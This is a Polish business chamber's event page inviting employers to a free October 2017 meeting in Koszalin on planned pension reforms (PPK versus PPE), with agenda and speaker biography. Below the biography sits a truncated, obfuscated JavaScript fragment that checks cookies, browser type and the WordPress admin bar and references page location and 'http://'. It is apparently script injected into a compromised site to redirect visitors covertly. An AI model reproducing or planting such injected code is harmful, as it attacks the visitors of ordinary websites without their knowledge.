Jak przygotować się do zmian przepisów emerytalnych? – Bezpłatne szkolenie. | Północna Izba Gospodarcza w Koszalinie

Północna Izba Gospodarcza oraz PZU Życie S.A. zapraszają przedsiębiorców do udziału w spotkaniu dotyczące zmian w przepisach emerytalnych.

Jak przygotować się do zmian przepisów emerytalnych?

Przyjęty przez Radę Ministrów (RM) w lutym 2017 r. Program Budowy Kapitału przygotowany przez Ministerstwo Rozwoju (MR) za główny cel stawia sobie zagwarantowanie bezpieczeństwa finansowego Polaków poprzez wsparcie rodzimego biznesu i stworzenie zabezpieczenia w formie realnej emerytury kapitałowej.

Nowe propozycje MR dążą do wprowadzenia obowiązkowego systemu oszczędzania organizowanego
i współfinansowanego przez pracodawców, które docelowo obejmą większość czynnych zawodowo obywateli. Założenia opierają się na brytyjskim systemie NEST, na bazie którego funkcjonować będą Pracownicze Plany Kapitałowe (PPK). PPK będą zmodyfikowaną formą obecnych pracowniczych programów emerytalnych (PPE).

Na czym będą polegać PPK, jakie obowiązki finansowe będą spoczywać na przedsiębiorcy, oraz czy PPE są lepszym rozwiązaniem, niż planowane zmiany?

O tym wszystkim powiemy podczas biznesowej kawy, na którą serdecznie zapraszamy w dniu
11 października 2017 o godzinie 12.00 w Park Caffe ul. A.Asnyka 11 w Koszalinie. Potwierdzenia obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie pod numer 537 184 630.

Poglądowy plan spotkania:

1.    Obecna sytuacja na rynku emerytalnym.

2.    Planowane zmiany w przepisach emerytalnych – wprowadzenie obowiązkowych Pracowniczych Programów Kapitałowych.

3.    Pracownicze Programy Emerytalne – korzyści dla pracodawcy i pracownika.

Szkolenie przeprowadzi Tomasz Fronczak – Dyrektor Biura Programów Emerytalno-Oszczędnościowych

  • Absolwent Uniwersytetu Warszawskiego Wydziału Prawa i Administracji, Podyplomowe studium Ubezpieczeń Gospodarczych na Akademii Ekonomicznej w Poznaniu. Od 17 lat związany z rynkiem finansowo – ubezpieczeniowym.
  • Od 2007 związany z TFI PZU SA jako Dyrektor ds. Programów Emerytalno – Oszczędnościowych,
    a następnie Dyrektor BPEO odpowiedzialny za relacje z Klientami Korporacyjnymi oraz tworzenie i obsługę prawną programów, koordynowanie procesów wdrażania a także nadzorowanie procesu rejestracji PPE w KNF.
  • Dotychczas przedstawiciel ponad 600 pracodawców w KNF podczas procesów rejestracji i zmiany instytucji zarządzających programami PPE.
  • Od 16 lat związany z Grupą PZU.

 

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m